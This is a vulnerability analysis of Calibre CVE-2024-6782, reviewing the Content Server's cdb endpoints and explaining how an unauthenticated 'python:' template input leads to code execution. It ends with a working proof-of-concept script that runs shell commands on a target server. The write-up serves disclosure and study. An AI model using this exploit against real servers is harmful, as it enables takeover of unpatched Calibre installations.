Calibre CVE: CVE-2024-6782
Calibre CVE: CVE-2024-6782
Table of Contents
[TOC]
Info
CVE Info
| Title | Description |
|---|---|
| Vendor | Calibre |
| Severity | Critical |
| Versions | 6.9.0 ~ 7.14.0 |
| CVE Description | Improper Access Control in Calibre Content Server allows remote code execution |
| NIST Description | Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution. |
| CWE Classification(s) | CWE-863: Incorrect Authorization |
| CAPEC Classification(s) | CAPEC-253: Remote Code Inclusion |
| CVSS 3.x Severity | 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| MITRE Date Record Created | 20240716 |
Reference:
Code Review
src/calibre/db/cli/cmd.list.py
1. SQL fields 資料庫設定
readonly = True
version = 0 # change this if you change signature of implementation()
FIELDS = {
'title', 'authors', 'author_sort', 'publisher', 'rating', 'timestamp', 'size',
'tags', 'comments', 'series', 'series_index', 'formats', 'isbn', 'uuid',
'pubdate', 'cover', 'last_modified', 'identifiers', 'languages', 'template'
}
fields name record
readonly
2. ebook format & path: formats() & cover()
def formats(db, book_id):
for fmt in db.formats(book_id, verify_formats=False):
path = db.format_abspath(book_id, fmt)
if path:
yield path.replace(os.sep, '/')
def cover(db, book_id):
return db.format_abspath(book_id, '__COVER_INTERNAL__')
Ebook format (db, bookid), 封面
file 絕對路徑
3. sort fields: implementation(): 從資料庫中查書,回傳JSON
def implementation(
db, notify_changes, fields, sort_by, ascending, search_text, limit, template=None
):
is_remote = notify_changes is not None
formatter = None
with db.safe_read_lock:
fm = db.field_metadata
afields = set(FIELDS) | {'id'}
for k in fm.custom_field_keys():
afields.add('*' + k[1:])
if 'all' in fields:
fields = sorted(afields if template else (afields - {'template'}))
sort_by = sort_by or 'id'
sort_fields = sort_by.split(',')
for sf in sort_fields:
if sf not in afields:
return f'Unknown sort field: {sf}'
sort_spec = [(sf, ascending) for sf in sort_fields]
if not set(fields).issubset(afields):
return 'Unknown fields: {}'.format(', '.join(set(fields) - afields))
if search_text:
book_ids = db.multisort(sort_spec, ids_to_sort=db.search(search_text))
else:
book_ids = db.multisort(sort_spec)
if limit > -1:
book_ids = book_ids[:limit]
data = {}
metadata = {}
for field in fields:
if field in 'id':
continue
if field == 'isbn':
x = db.all_field_for('identifiers', book_ids, default_value={})
data[field] = {k: v.get('isbn') or '' for k, v in iteritems(x)}
continue
if field == 'template':
vals = {}
global_vars = {}
if formatter is None:
from calibre.ebooks.metadata.book.formatter import SafeFormat
formatter = SafeFormat()
for book_id in book_ids:
mi = db.get_proxy_metadata(book_id)
vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars)
data['template'] = vals
continue
field = field.replace('*', '#')
metadata[field] = fm[field]
if not is_remote:
if field == 'formats':
data[field] = {k: list(formats(db, k)) for k in book_ids}
continue
if field == 'cover':
data[field] = {k: cover(db, k) for k in book_ids}
continue
data[field] = db.all_field_for(field, book_ids)
return {'book_ids': book_ids, "data": data, 'metadata': metadata, 'fields':fields}
(v.7.21.0) 檢查 notify_changes , 遠端執行禁用 template\
驗證 afields(所有欄位) 提取資料:
(1)
id: 忽略 id (2)identifiers: 從 identifiers 取 isbn (3)template: 如果未禁用,設定 SafeFormat()格式化工具 (4) field name: * replace # (5)formatscall 上方 formats() 檔案格式路徑 (6)covercall 上方 cover() 封面檔案路徑
fields & book_ids structure example:
{
'title': {101: 'Harry Potter', 102: 'The Hobbit', 103: '1984'},
'author': {101: 'J.K. Rowling', 102: 'J.R.R. Tolkien', 103: 'George Orwell'},
'isbn': {101: '9780747532743', 102: '9780547928227', 103: '9780451524935'}
}
4. do_list() 輸出格式
def do_list(
dbctx,
fields,
afields,
sort_by,
ascending,
search_text,
line_width,
separator,
prefix,
limit,
template,
template_file,
template_title,
for_machine=False
):
- CLI
option_parser(): 列出書籍--fields: 顯示指定欄位 (*authors)--sort-by: 排序--ascending: 升降冪--search: 搜尋條件--line-width: single line 寬度--separator: 分隔字串的符號--prefix: 檔案路徑的前綴--limit: 限制顯示數量--for-machine: output JSON--template 和 --template_file: 指定 template 路徑--template_heading: template title
src/calibre/srv/cdb.py
REST API
1. cdb_run: command module
@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
{which}: module name
{version=0}: module version
@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_run(ctx, rd, which, version):
try:
m = module_for_cmd(which)
except ImportError:
raise HTTPNotFound(f'No module named: {which}')
if not getattr(m, 'readonly', False):
ctx.check_for_write_access(rd)
if getattr(m, 'version', 0) != int(version):
raise HTTPNotFound(('The module {} is not available in version: {}.'
'Make sure the version of calibre used for the'
' server and calibredb match').format(which, version))
db = get_library_data(ctx, rd, strict_library_id=True)[0]
if ctx.restriction_for(rd, db):
raise HTTPForbidden('Cannot use the command-line db interface with a user who has per library restrictions')
raw = rd.read()
ct = rd.inheaders.get('Content-Type', all=True)
ct = {x.lower().partition(';')[0] for x in ct}
try:
if MSGPACK_MIME in ct:
args = msgpack_loads(raw)
elif 'application/json' in ct:
args = json_loads(raw)
else:
raise HTTPBadRequest('Only JSON or msgpack requests are supported')
except Exception:
raise HTTPBadRequest('args are not valid encoded data')
if getattr(m, 'needs_srv_ctx', False):
args = [ctx] + list(args)
try:
result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args)
except Exception as err:
tb = ''
if not getattr(err, 'suppress_traceback', False):
import traceback
tb = traceback.format_exc()
return {'err': as_unicode(err), 'tb': tb}
return {'result': result}
驗證寫入權限、版本、library_id、user權限
HTTP response (Content-Type: msgpack or JSON)
呼叫implementation():db,ctx.notify_changes,args
result = m.implementation(db, partial(ctx.notify_changes, db.backend.library_path), *args)
2. cdb_add_book: Add book
@endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}', needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
{job_id}:task ID
{add_duplicates}:新增重複書籍
{filename}:書籍名稱
{library_id}:指定目標書庫
@endpoint('/cdb/add-book/{job_id}/{add_duplicates}/{filename}/{library_id=None}',
needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_add_book(ctx, rd, job_id, add_duplicates, filename, library_id):
'''
Add a file as a new book. The file contents must be in the body of the request.
The response will also have the title/authors/languages read from the
metadata of the file/filename. It will contain a `book_id` field specifying
the id of the newly added book, or if add_duplicates is not specified and a
duplicate was found, no book_id will be present, instead there will be a
`duplicates` field specifying the title and authors for all duplicate
matches. It will also return the value of `job_id` as the `id` field and
`filename` as the `filename` field.
'''
db = get_db(ctx, rd, library_id)
if ctx.restriction_for(rd, db):
raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions')
if not filename:
raise HTTPBadRequest('An empty filename is not allowed')
sfilename = sanitize_file_name(filename)
fmt = os.path.splitext(sfilename)[1]
fmt = fmt[1:] if fmt else None
if not fmt:
raise HTTPBadRequest('An filename with no extension is not allowed')
if isinstance(rd.request_body_file, BytesIO):
raise HTTPBadRequest('A request body containing the file data must be specified')
add_duplicates = add_duplicates in ('y', '1')
path = os.path.join(rd.tdir, sfilename)
rd.request_body_file.seek(0)
with open(path, 'wb') as f:
shutil.copyfileobj(rd.request_body_file, f)
from calibre.ebooks.metadata.worker import run_import_plugins
path = run_import_plugins((path,), time.monotonic_ns(), rd.tdir)[0]
with open(path, 'rb') as f:
mi = get_metadata(f, stream_type=os.path.splitext(path)[1][1:], use_libprs_metadata=True)
f.seek(0)
nfmt = os.path.splitext(path)[1]
fmt = nfmt[1:] if nfmt else fmt
ids, duplicates = db.add_books([(mi, {fmt: f})], add_duplicates=add_duplicates)
ans = {'title': mi.title, 'authors': mi.authors, 'languages': mi.languages, 'filename': filename, 'id': job_id}
if ids:
ans['book_id'] = ids[0]
ctx.notify_changes(db.backend.library_path, books_added(ids))
else:
ans['duplicates'] = [{'title': m.title, 'authors': m.authors} for m, _ in duplicates]
return ans
驗證 user 資料庫訪問權限
Check filename & extension name
提取書籍 metadata
檢查重複
3. cdb_delete_book: Delete book
@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
{book_ids}: 刪除的 book ID
{library_id}: 資料庫 ID
@endpoint('/cdb/delete-books/{book_ids}/{library_id=None}',
needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_delete_book(ctx, rd, book_ids, library_id):
db = get_db(ctx, rd, library_id)
if ctx.restriction_for(rd, db):
raise HTTPForbidden('Cannot use the delete book interface with a user who has per library restrictions')
try:
ids = {int(x) for x in book_ids.split(',')}
except Exception:
raise HTTPBadRequest(f'invalid book_ids: {book_ids}')
db.remove_books(ids)
ctx.notify_changes(db.backend.library_path, books_deleted(ids))
return {}
驗證 user 資料庫訪問權限
notify_changes 通知 Server 已刪除
4. cdb_set_cover: Set cover
@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
{book_ids}: 設置封面的 book ID
{library_id}: 資料庫 ID
@endpoint('/cdb/set-cover/{book_id}/{library_id=None}', types={'book_id': int},
needs_db_write=True, postprocess=json, methods=receive_data_methods, cache_control='no-cache')
def cdb_set_cover(ctx, rd, book_id, library_id):
db = get_db(ctx, rd, library_id)
if ctx.restriction_for(rd, db):
raise HTTPForbidden('Cannot use the add book interface with a user who has per library restrictions')
rd.request_body_file.seek(0)
dirtied = db.set_cover({book_id: rd.request_body_file})
ctx.notify_changes(db.backend.library_path, metadata(dirtied))
return tuple(dirtied)
5. cdb_set_fields 編輯書籍
@endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int}, needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
{book_ids}: 編輯的 book ID
{library_id}: 資料庫 ID
@endpoint('/cdb/set-fields/{book_id}/{library_id=None}', types={'book_id': int},
needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_set_fields(ctx, rd, book_id, library_id):
db = get_db(ctx, rd, library_id)
if ctx.restriction_for(rd, db):
raise HTTPForbidden('Cannot use the set fields interface with a user who has per library restrictions')
data = load_payload_data(rd)
try:
changes, loaded_book_ids = data['changes'], frozenset(map(int, data.get('loaded_book_ids', ())))
all_dirtied = bool(data.get('all_dirtied'))
if not isinstance(changes, dict):
raise TypeError('changes must be a dict')
except Exception:
raise HTTPBadRequest(
'''Data must be of the form {'changes': {'title': 'New Title', ...}, 'loaded_book_ids':[book_id1, book_id2, ...]'}''')
dirtied = set()
cdata = changes.pop('cover', False)
if cdata is not False:
if cdata is not None:
try:
cdata = from_base64_bytes(cdata.split(',', 1)[-1])
except Exception:
raise HTTPBadRequest('Cover data is not valid base64 encoded data')
try:
fmt = what(None, cdata)
except Exception:
fmt = None
if fmt not in ('jpeg', 'png'):
raise HTTPBadRequest('Cover data must be either JPEG or PNG')
dirtied |= db.set_cover({book_id: cdata})
added_formats = changes.pop('added_formats', False)
if added_formats:
for data in added_formats:
try:
fmt = data['ext'].upper()
except Exception:
raise HTTPBadRequest('Format has no extension')
if fmt:
try:
fmt_data = from_base64_bytes(data['data_url'].split(',', 1)[-1])
except Exception:
raise HTTPBadRequest('Format data is not valid base64 encoded data')
if db.add_format(book_id, fmt, ReadOnlyFileBuffer(fmt_data)):
dirtied.add(book_id)
removed_formats = changes.pop('removed_formats', False)
if removed_formats:
db.remove_formats({book_id: list(removed_formats)})
dirtied.add(book_id)
for field, value in iteritems(changes):
dirtied |= db.set_field(field, {book_id: value})
ctx.notify_changes(db.backend.library_path, metadata(dirtied))
all_ids = dirtied if all_dirtied else (dirtied & loaded_book_ids)
all_ids |= {book_id}
return {bid: book_as_json(db, bid) for bid in all_ids}
驗證 user 資料庫訪問權限
library_id找資料庫
載入 book file (JSON or msgpack)
新增/刪除格式: added/delete_formats = changes.pop('added/delete_formats', False)
6. cdb_copy_to_library
@endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True, postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
@endpoint('/cdb/copy-to-library/{target_library_id}/{library_id=None}', needs_db_write=True,
postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_copy_to_library(ctx, rd, target_library_id, library_id):
db_src = get_db(ctx, rd, library_id)
db_dest = get_db(ctx, rd, target_library_id)
if ctx.restriction_for(rd, db_src) or ctx.restriction_for(rd, db_dest):
raise HTTPForbidden('Cannot use the copy to library interface with a user who has per library restrictions')
data = load_payload_data(rd)
try:
book_ids = {int(x) for x in data['book_ids']}
move_books = bool(data.get('move', False))
preserve_date = bool(data.get('preserve_date', True))
duplicate_action = data.get('duplicate_action') or 'add'
automerge_action = data.get('automerge_action') or 'overwrite'
except Exception:
raise HTTPBadRequest('Invalid encoded data, must be of the form: {book_ids: [id1, id2, ..]}')
if duplicate_action not in ('add', 'add_formats_to_existing', 'ignore'):
raise HTTPBadRequest('duplicate_action must be one of: add, add_formats_to_existing, ignore')
if automerge_action not in ('overwrite', 'ignore', 'new record'):
raise HTTPBadRequest('automerge_action must be one of: overwrite, ignore, new record')
response = {}
identical_books_data = None
if duplicate_action != 'add':
identical_books_data = db_dest.data_for_find_identical_books()
to_remove = set()
from calibre.db.copy_to_library import copy_one_book
for book_id in book_ids:
try:
rdata = copy_one_book(
book_id, db_src, db_dest, duplicate_action=duplicate_action, automerge_action=automerge_action,
preserve_uuid=move_books, preserve_date=preserve_date, identical_books_data=identical_books_data)
if move_books:
to_remove.add(book_id)
response[book_id] = {'ok': True, 'payload': rdata}
except Exception:
import traceback
response[book_id] = {'ok': False, 'payload': traceback.format_exc()}
if to_remove:
db_src.remove_books(to_remove, permanent=True)
return response
驗證 user 資料庫訪問權限
db_src & db_dest: 來源/目標 資料庫
- duplicate_action 檢查重複
- copy_one_book(...) 刪除 src
Vulnerability Details
cdb.py 透過呼叫 REST API 可以 route cmd_list.py。因此 cdb.py 可以透過 /cdb/cmd/list 動態載入 cmd_list.py,並執行其中的 implementation() 函數。
cmd_list.py::implementation()繞過驗證 input 身份
1. src/calibre/srv/cdb.py 載入 module
@endpoint('/cdb/cmd/{which}/{version=0}', postprocess=msgpack_or_json, methods=receive_data_methods, cache_control='no-cache')
def cdb_run(ctx, rd, which, version):
try:
m = module_for_cmd(which)
except ImportError:
raise HTTPNotFound(f'No module named: {which}')
if not getattr(m, 'readonly', False):
ctx.check_for_write_access(rd)
if getattr(m, 'version', 0) != int(version):
raise HTTPNotFound(('The module {} is not available in version: {}.'
'Make sure the version of calibre used for the'
' server and calibredb match').format(which, version))
code review 解釋的 {which} 會對應請求的子路徑。
例如, /cdb/cmd/list 會導致載入 cmd_list.py
若 module 為 readonly 或 設定為 false, 就不會執行check_for_write_access(rd), 以此繞過權限驗證。
2. 偽造 template 輸入
cmd_list.py::implementation() 函數中,將 user input 當作 template 內容處理
if field == 'template':
vals = {}
global_vars = {}
if formatter is None:
from calibre.ebooks.metadata.book.formatter import SafeFormat
formatter = SafeFormat()
for book_id in book_ids:
mi = db.get_proxy_metadata(book_id)
vals[book_id] = formatter.safe_format(template, {}, 'TEMPLATE ERROR', mi, global_vars=global_vars)
data['template'] = vals
continue
field = field.replace('*', '#')
metadata[field] = fm[field]
只要讓 formatter.safe_format() 成功解析,可以自訂輸入 templaye 內容
3. evaluate()執行前綴
src/calibre/utils/formatter.py 使用 evaluate(),可以以 python: 開頭前綴的輸入來任意執行 code
def evaluate(self, fmt, args, kwargs, global_vars, break_reporter=None):
if fmt.startswith('program:'):
ans = self._eval_program(kwargs.get('$', None), fmt[8:],
self.column_name, global_vars, break_reporter)
elif fmt.startswith('python:'):
ans = self._eval_python_template(fmt[7:], self.column_name)
else:
ans = self.vformat(fmt, args, kwargs)
if self.strip_results:
ans = self.compress_spaces.sub(' ', ans)
if self.strip_results:
ans = ans.strip(' ')
return ans
Proof-of-Concept (Ref: starlabs)
#! /usr/bin/env python3
# PoC for: CVE-2024-6782
# Description: Unauthenticated remote code execution in calibre <= 7.14.0
# Written by: Amos Ng (@LFlare)
import json
import sys
import requests
_target = "http://localhost:8080"
def exploit(cmd):
r = requests.post(
f"{_target}/cdb/cmd/list",
headers={"Content-Type": "application/json"},
json=[
["template"],
"", # sortby: leave empty
"", # ascending: leave empty
"", # search_text: leave empty, set to all
1, # limit results
f"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()\n except Exception:\n return subprocess.check_output(['sh', '-c', '{cmd}']).decode()", # payload
],
)
try:
print(list(r.json()["result"]["data"]["template"].values())[0])
except Exception as e:
print(r.text)
if __name__ == "__main__":
exploit("whoami")
template 內容
python:def evaluate(a, b):
import subprocess
try:
return subprocess.check_output(['cmd.exe', '/c', '{cmd}']).decode()
except Exception:
return subprocess.check_output(['sh', '-c', '{cmd}']).decode()
Patch
https://github.com/kovidgoyal/calibre/commit/38a1bf50d8cd22052ae59c513816706c6445d5e9
